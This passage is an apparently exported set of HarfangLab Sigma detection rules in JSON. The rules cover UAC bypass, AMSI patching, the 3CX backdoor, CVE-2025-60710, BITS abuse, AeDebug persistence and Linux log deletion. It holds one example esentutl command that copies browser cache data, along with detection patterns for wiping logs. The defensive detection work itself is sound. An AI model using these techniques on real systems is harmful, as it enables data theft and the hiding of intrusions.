https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/09/10\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.002\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image: '?:\\Windows\\System32\\consent.exe'\n ImageLoaded|endswith: '\\Windows\\System32\\consent.exe.local\\\\*\\comctl32.dll'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "23ec89c2-af05-41a4-aa3a-a08516d8e33c", "rule_name": "UAC Bypass Executed via consent", "rule_description": "Detects an unsigned DLL being loaded by consent.exe.\nThis may be indicative of a technique used for circumventing User Account Control (UAC) to escalate privileges.\nWindows User Account Control allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate the behavior of consent.exe and to identify the process responsible for the DLL file creation.\n", "rule_creation_date": "2020-09-10", "rule_modified_date": "2025-02-13", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1548.002", "attack.t1574.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "240337a9-d676-4c03-b22e-8f7efcef8f2d", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.086779Z", "creation_date": "2026-03-23T11:45:34.086781Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.086786Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/h0ru/AMSI-Reaper", "https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal", "https://attack.mitre.org/techniques/T1562/001/" ], "name": "t1562_001_amsi_reaper_powershell.yml", "content": "title: PowerShell AMSI Reaper Executed\nid: 240337a9-d676-4c03-b22e-8f7efcef8f2d\ndescription: |\n Detects the execution of the AMSI (Antimalware Scan Interface) Reaper PowerShell tool.\n This tool prevents the Windows AMSI to scan a specified process by patching the entry point of AmsiOpenSession in amsi.dll.\n It is recommended to analyze the process executing this PowerShell script as well as to look for other type of malicious behavior on the target host.\nreferences:\n - https://github.com/h0ru/AMSI-Reaper\n - https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2024/02/07\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.AMSIReaper\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_name:\n PowershellCommand|contains: 'AMSIReaper'\n\n selection_amsi:\n PowershellCommand|contains|all:\n - 'AmsiOpenSession'\n - 'amsi.dll'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "240337a9-d676-4c03-b22e-8f7efcef8f2d", "rule_name": "PowerShell AMSI Reaper Executed", "rule_description": "Detects the execution of the AMSI (Antimalware Scan Interface) Reaper PowerShell tool.\nThis tool prevents the Windows AMSI to scan a specified process by patching the entry point of AmsiOpenSession in amsi.dll.\nIt is recommended to analyze the process executing this PowerShell script as well as to look for other type of malicious behavior on the target host.\n", "rule_creation_date": "2024-02-07", "rule_modified_date": "2025-02-05", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1562.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "24117cea-8f26-491f-a109-aa3ea8e9fc04", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.604215Z", "creation_date": "2026-03-23T11:45:34.604218Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.604225Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats", "https://www.trendmicro.com/de_de/research/23/c/information-on-attacks-involving-3cx-desktop-app.html", "https://attack.mitre.org/techniques/T1102/" ], "name": "t1102_3cx_github_dns.yml", "content": "title: Backdoored 3CXDesktopApp Github Communication Detected\nid: 24117cea-8f26-491f-a109-aa3ea8e9fc04\ndescription: |\n Detects DNS requests to github.com and raw.githubusercontent.com made by the 3CXDesktopApp software.\n In late March 2023, the 3CXDesktopApp software was backdoored and turned into a stealer to in a wide supply chain attack.\n The backdoored 3CXDesktopApp gathers C2 URLs through a GitHub repository.\n It is recommended to terminate the 3CX software, to update it to a safe version and to look for signs of malicious actions stemming from the 3CX process.\nreferences:\n - https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats\n - https://www.trendmicro.com/de_de/research/23/c/information-on-attacks-involving-3cx-desktop-app.html\n - https://attack.mitre.org/techniques/T1102/\ndate: 2023/03/31\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1195.002\n - attack.command_and_control\n - attack.t1102\n - attack.t1071.001\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Trojan.3CX\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName:\n - 'github.com'\n - 'raw.githubusercontent.com'\n ProcessOriginalFileName: '3CXDesktopApp.exe'\n\n condition: selection\nlevel: critical\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "24117cea-8f26-491f-a109-aa3ea8e9fc04", "rule_name": "Backdoored 3CXDesktopApp Github Communication Detected", "rule_description": "Detects DNS requests to github.com and raw.githubusercontent.com made by the 3CXDesktopApp software.\nIn late March 2023, the 3CXDesktopApp software was backdoored and turned into a stealer to in a wide supply chain attack.\nThe backdoored 3CXDesktopApp gathers C2 URLs through a GitHub repository.\nIt is recommended to terminate the 3CX software, to update it to a safe version and to look for signs of malicious actions stemming from the 3CX process.\n", "rule_creation_date": "2023-03-31", "rule_modified_date": "2025-04-08", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control", "attack.initial_access" ], "rule_technique_tags": [ "attack.t1071.001", "attack.t1102", "attack.t1195.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "244d41bc-5373-4c23-8781-b57d4dd31e2d", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.604446Z", "creation_date": "2026-03-23T11:45:34.604449Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.604457Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/Wh04m1001/CVE-2025-60710", "https://nvd.nist.gov/vuln/detail/CVE-2025-60710", "https://attack.mitre.org/techniques/T1187/" ], "name": "cve_2025_60710_windows_recall.yml", "content": "title: CVE-2025-60710 Windows Recall Privilege Escalation\nid: 244d41bc-5373-4c23-8781-b57d4dd31e2d\ndescription: |\n Detects file manipulation associated with CVE-2025-60710.\n CVE-2025-60710 is a local privilege escalation issue where a Windows scheduled task (WindowsAI\\Recall\\PolicyConfiguration) deletes GUID-pattern folders in %LOCALAPPDATA% without validating symlinks.\n A low privilege user can plant a malicious symlinked directory to force SYSTEM level arbitrary folder deletion.\n The task’s multiple triggers let an attacker reliably invoke the deletion.\n It is recommended to check the related process for suspicious activities.\nreferences:\n - https://github.com/Wh04m1001/CVE-2025-60710\n - https://nvd.nist.gov/vuln/detail/CVE-2025-60710\n - https://attack.mitre.org/techniques/T1187/\ndate: 2025/11/14\nmodified: 2025/11/17\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - cve.2025-60710\n - classification.Windows.Source.Filesystem\n - classification.Windows.Exploit.Recall\n - classification.Windows.Exploit.CVE-2025-60710\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: filesystem_rename\ndetection:\n selection:\n Path: '?:\\Users\\\\*\\AppData\\Local\\CoreAIPlatform.00\\UKP\\{????????-????-????-????-????????????}'\n TargetPath|startswith: '?:\\Windows'\n\n filter_system:\n ProcessUserSID: 'S-1-5-18'\n\n condition: selection and not filter_system\nlevel: critical\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "244d41bc-5373-4c23-8781-b57d4dd31e2d", "rule_name": "CVE-2025-60710 Windows Recall Privilege Escalation", "rule_description": "Detects file manipulation associated with CVE-2025-60710.\nCVE-2025-60710 is a local privilege escalation issue where a Windows scheduled task (WindowsAI\\Recall\\PolicyConfiguration) deletes GUID-pattern folders in %LOCALAPPDATA% without validating symlinks.\nA low privilege user can plant a malicious symlinked directory to force SYSTEM level arbitrary folder deletion.\nThe task’s multiple triggers let an attacker reliably invoke the deletion.\nIt is recommended to check the related process for suspicious activities.\n", "rule_creation_date": "2025-11-14", "rule_modified_date": "2025-11-17", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1068" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "24693ed1-f629-47e5-bb5e-0ce442188fe9", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.071195Z", "creation_date": "2026-03-23T11:45:34.071197Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.071201Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://docs.microsoft.com/en-us/windows/win32/api/bits/nn-bits-ibackgroundcopymanager", "https://blog.menasec.net/2021/05/hunting-for-suspicious-usage-of.html", "https://attack.mitre.org/techniques/T1197/", "https://attack.mitre.org/techniques/T1105/", "https://attack.mitre.org/software/S0190/" ], "name": "t1197_suspicious_binary_launched_by_bits.yml", "content": "title: Suspicious Binary Launched via BITS\nid: 24693ed1-f629-47e5-bb5e-0ce442188fe9\ndescription: |\n Detects execution of suspicious binary launched by BITS.\n This is typically the case of programs set to execute via the SetNotifyCmdline method from IBackgroundCopyManager interface.\n This method is often used by attackers to download malicious files, exfiltrate data or maintain persistence.\n It is recommended to investigate the created process for suspicious activities.\nreferences:\n - https://docs.microsoft.com/en-us/windows/win32/api/bits/nn-bits-ibackgroundcopymanager\n - https://blog.menasec.net/2021/05/hunting-for-suspicious-usage-of.html\n - https://attack.mitre.org/techniques/T1197/\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/software/S0190/\ndate: 2021/07/30\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.t1197\n - attack.command_and_control\n - attack.t1105\n - attack.s0190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # C:\\Windows\\System32\\svchost.exe -k netsvcs -p -s BITS\n ParentImage|endswith: '\\svchost.exe'\n ParentCommandLine|contains: ' BITS'\n\n exclusion_bits:\n CommandLine: '?:\\windows\\System32\\svchost.exe -k netsvcs -p -s BITS'\n ParentCommandLine: '?:\\windows\\System32\\svchost.exe -k netsvcs -p -s BITS'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_directxdatabaseupdater.exe:\n # C:\\Windows\\System32\\directxdatabaseupdater.exe\n Image|endswith: '\\directxdatabaseupdater.exe'\n OriginalFileName: 'DirectXDatabaseUpdater.exe'\n\n exclusion_werfault:\n Image|endswith: '\\WerFault.exe'\n CommandLine|contains: '\\WerFault.exe -u -p '\n OriginalFileName: 'WerFault.exe'\n Signed: 'true'\n\n exclusion_mcafee:\n # McAfee WebAdvisor(bootstrap installer) (SaBsi module)\n ProcessSignature:\n - 'McAfee, Inc.'\n - 'McAfee, LLC'\n - 'MUSARUBRA US LLC' # new signer name for mcafee/trellix it seems\n\n exclusion_yandex:\n Image|endswith: '\\Yandex\\YandexBrowser\\Application\\browser.exe'\n Signed: 'true'\n ProcessSignature: 'YANDEX LLC'\n\n exclusion_opera_setup:\n Image|endswith: '\\OperaSetup.exe'\n Signed: 'true'\n Signature: 'Opera Norway AS'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "24693ed1-f629-47e5-bb5e-0ce442188fe9", "rule_name": "Suspicious Binary Launched via BITS", "rule_description": "Detects execution of suspicious binary launched by BITS.\nThis is typically the case of programs set to execute via the SetNotifyCmdline method from IBackgroundCopyManager interface.\nThis method is often used by attackers to download malicious files, exfiltrate data or maintain persistence.\nIt is recommended to investigate the created process for suspicious activities.\n", "rule_creation_date": "2021-07-30", "rule_modified_date": "2025-04-15", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control", "attack.defense_evasion", "attack.persistence" ], "rule_technique_tags": [ "attack.t1105", "attack.t1197" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "248a91c7-af38-4792-8ffb-942e6e7ce41b", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.611456Z", "creation_date": "2026-03-23T11:45:34.611459Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.611466Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/", "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", "https://www.trendmicro.com/fr_fr/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html", "https://attack.mitre.org/techniques/T1005/" ], "name": "t1005_suspicious_browser_data_theft.yml", "content": "title: Possible Browser Data Theft via Esentutl\nid: 248a91c7-af38-4792-8ffb-942e6e7ce41b\ndescription: |\n Detects the suspicious execution of the legitimate esentutl.exe Windows binary to collect browser data from Internet Explorer and Microsoft Edge via the web cache.\n The Qakbot malware is known to use this technique to steal sensitive information.\n It is recommended to analyze the process responsible for the execution of Esentutl to determine whether its usage is legitimate.\nreferences:\n - https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/\n - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/\n - https://www.trendmicro.com/fr_fr/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html\n - https://attack.mitre.org/techniques/T1005/\ndate: 2022/04/22\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Esentutl\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Collection\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\esentutl.exe'\n # esentutl.exe /r V01 /lC:\\Users\\xxx\\AppData\\Local\\Microsoft\\Windows\\WebCache /sC:\\Users\\xxx\\AppData\\Local\\Microsoft\\Windows\\WebCache /dC:\\Users\\xxx\\AppData\\Local\\Microsoft\\Windows\\WebCache\n CommandLine|contains|all:\n - 'esentutl.exe'\n - ' /r V01 '\n - ' /l'\n - ' /s'\n - ' /d'\n - '\\AppData\\Local\\Microsoft\\Windows\\WebCache'\n condition: selection\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "248a91c7-af38-4792-8ffb-942e6e7ce41b", "rule_name": "Possible Browser Data Theft via Esentutl", "rule_description": "Detects the suspicious execution of the legitimate esentutl.exe Windows binary to collect browser data from Internet Explorer and Microsoft Edge via the web cache.\nThe Qakbot malware is known to use this technique to steal sensitive information.\nIt is recommended to analyze the process responsible for the execution of Esentutl to determine whether its usage is legitimate.\n", "rule_creation_date": "2022-04-22", "rule_modified_date": "2025-04-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.collection" ], "rule_technique_tags": [ "attack.t1005" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "24914a2f-f501-410c-8f63-d70ae6a01f4d", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.617329Z", "creation_date": "2026-03-23T11:45:34.617331Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.617335Z", "rule_level": "medium", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://persistence-info.github.io/Data/aedebug.html", "https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging", "https://attack.mitre.org/techniques/T1546/" ], "name": "t1546_persistence_aedebug.yml", "content": "title: Possible AeDebug Persistence Added\nid: 24914a2f-f501-410c-8f63-d70ae6a01f4d\ndescription: |\n Detects the creation or modification of the AeDebug registry key to enable debugger execution on application crashes.\n Attackers can set this registry value to point to a malicious payload to achieve persistence.\n It is recommended to investigate whether the debugger specified under the AeDebug registry key is legitimate and authorized.\nreferences:\n - https://persistence-info.github.io/Data/aedebug.html\n - https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging\n - https://attack.mitre.org/techniques/T1546/\ndate: 2022/07/20\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AeDebug\\Debugger'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n - '\"\"'\n\n exclusion_debuggers:\n Details|contains:\n - 'windbg.exe'\n - 'vsjitdebugger.exe'\n\n exclusion_piksels_digital_signage_debug:\n ProcessImage: '?:\\Program Files\\Digital signage ??\\kspAdminService.exe'\n Details|contains: '?:\\Program Files\\Digital signage 11\\ntsd.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "24914a2f-f501-410c-8f63-d70ae6a01f4d", "rule_name": "Possible AeDebug Persistence Added", "rule_description": "Detects the creation or modification of the AeDebug registry key to enable debugger execution on application crashes.\nAttackers can set this registry value to point to a malicious payload to achieve persistence.\nIt is recommended to investigate whether the debugger specified under the AeDebug registry key is legitimate and authorized.\n", "rule_creation_date": "2022-07-20", "rule_modified_date": "2025-02-13", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.persistence" ], "rule_technique_tags": [ "attack.t1546" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "249d762f-c5a2-406d-acf3-071a10d93210", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "weak", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:35.297021Z", "creation_date": "2026-03-23T11:45:35.297023Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:35.297028Z", "rule_level": "medium", "rule_confidence": "weak", "rule_confidence_override": null, "references": [ "https://atomicredteam.io/defense-evasion/T1070.002/", "https://attack.mitre.org/techniques/T1070/002/" ], "name": "t1070_002_system_logs_removed_cli_linux.yml", "content": "title: System Logs Removed via Command-line\nid: 249d762f-c5a2-406d-acf3-071a10d93210\ndescription: |\n Detects an attempt to remove any of the system's logs.\n Attackers can try to remove the system's logs to hide their tracks.\n It is recommended to investigate responsible for this action and to look for other malicious actions stemming from it.\nreferences:\n - https://atomicredteam.io/defense-evasion/T1070.002/\n - https://attack.mitre.org/techniques/T1070/002/\ndate: 2023/01/03\nmodified: 2026/03/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Deletion\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_bin:\n Image|endswith:\n - '/rm'\n - '/unlink'\n - '/shred'\n - '/truncate'\n ParentImage|contains: '?'\n\n selection_files:\n CommandLine|contains:\n - 'auth.log'\n - 'boot.log'\n - 'history.log'\n - 'cron.log'\n - 'dmesg'\n - 'dpkg.log'\n - 'kern.log'\n - 'messages'\n - 'secure'\n - 'syslog'\n - 'utmp'\n - 'wtmp'\n - 'journal'\n\n selection_command:\n CommandLine|contains:\n - '/var/log'\n - '/var/logs'\n - '/var/audit'\n - '/run/log/journal'\n\n selection_directory:\n CurrentDirectory|contains:\n - '/var/log/'\n - '/var/logs/'\n - '/var/audit/'\n - '/run/log/journal/'\n\n filter_slash:\n CommandLine|contains: ' /'\n\n exclusion_cron:\n - ParentImage:\n - '/usr/sbin/cron'\n - '/usr/sbin/crond'\n - Ancestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n\n exclusion_docker:\n - GrandparentCommandLine|startswith:\n - '/bin/sh /usr/bin/docker-containerd-shim '\n - '/usr/bin/docker-containerd-shim-current '\n - '/usr/libexec/docker/docker-runc-current '\n - Ancestors|contains:\n - '|/usr/bin/dockerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_debian_installer:\n - ParentImage: '/usr/bin/dpkg'\n - ProcessAncestors|contains: '|/usr/bin/dpkg|'\n\n exclusion_savelog:\n CommandLine: 'rm -f -- /var/log//dmesg.? /var/log//dmesg.?.gz'\n ParentCommandLine|contains|all:\n - 'savelog'\n - '/var/log/dmesg'\n GrandparentImage|endswith: '/systemd'\n\n exclusion_genesys:\n CommandLine|contains: 'rm -f *.log.gz'\n ParentCommandLine|contains: '/opt/genesys/logcompress.sh'\n\n exclusion_apt:\n Image:\n - '/usr/bin/apt-get'\n - '/usr/bin/apt'\n\n exclusion_pmlogger:\n - ParentCommandLine|contains:\n - '/bin/sh /usr/libexec/pcp/bin/pmlogger_daily'\n - '/bin/sh /usr/libexec/pcp/bin/pmlogger_check'\n - '/bin/sh /usr/lib/pcp/bin/pmlogger_daily'\n - '/bin/sh /usr/lib/pcp/bin/pmlogger_check'\n - GrandparentCommandLine|contains:\n - '/bin/sh /usr/libexec/pcp/bin/pmlogger_daily'\n - '/bin/sh /usr/libexec/pcp/bin/pmlogger_check'\n - '/bin/sh /usr/lib/pcp/bin/pmlogger_daily'\n - '/bin/sh /usr/lib/pcp/bin/pmlogger_check'\n\n exclusion_insights:\n CommandLine|contains: '/usr/bin/python /usr/bin/insights-client'\n\n exclusion_yum:\n GrandparentCommandLine|startswith: '/usr/libexec/platform-python /bin/yum'\n\n exclusion_intertel:\n - ParentCommandLine|contains: '/opt/intertel/bin/findcore'\n - GrandparentCommandLine|contains: '/opt/intertel/bin/findcore'\n\n exclusion_mbgui:\n GrandparentCommandLine: 'runsv mbgui'\n\n exclusion_nagios_group:\n ProcessGroup: 'nagios'\n ProcessAncestors|contains:\n - '/crond|'\n - '/naemon|'\n\n exclusion_nagios:\n - ParentCommandLine|contains:\n - 'check_scan_spal.sh'\n - 'check_snmp_svc'\n - 'check_snmp_load'\n - GrandparentCommandLine|contains:\n - 'check_scan_spal.sh'\n - 'check_snmp_svc'\n - 'check_snmp_load'\n - ParentCommandLine|startswith:\n - '/bin/sh /srv/tomcat/scripts/'\n - '/bin/bash /srv/tomcat/scripts/'\n - GrandparentCommandLine|startswith:\n - '/bin/sh /srv/tomcat/scripts/'\n - '/bin/bash /srv/tomcat/scripts/'\n\n exclusion_popularity_contest:\n - ParentCommandLine: '/bin/sh /etc/cron.daily/popularity-contest'\n - GrandparentCommandLine: '/bin/sh /etc/cron.daily/popularity-contest'\n\n exclusion_moodle_sortlogs:\n ParentCommandLine: 'bash /usr/local/bin/moodle_sortlogs /var/log/moodle/cron /var/log/moodle'\n\n exclusion_pmcd:\n ParentCommandLine:\n - '/bin/sh /usr/libexec/pcp/lib/pmcd start-systemd'\n - '/bin/sh /usr/share/pcp/lib/pmcd start'\n\n exclusion_qradar:\n ParentCommandLine|contains:\n - '--login /opt/qradar/perf/systemStabMon -interval ??'\n - '/opt/qradar/bin/check_date_change.sh'\n\n exclusion_logrote:\n - ProcessParentImage: '/usr/sbin/logrotate'\n - ProcessAncestors|contains: '|/usr/sbin/logrotate|'\n\n exclusion_eset:\n ProcessAncestors|contains: '|/opt/eset/RemoteAdministrator/Agent/ERAAgent|'\n\n exclusion_purge:\n ProcessImage:\n - '/bin/rm'\n - '/usr/bin/rm'\n ProcessParentImage:\n - '/bin/find'\n - '/usr/bin/find'\n ProcessParentCommandLine|contains|all:\n - ' 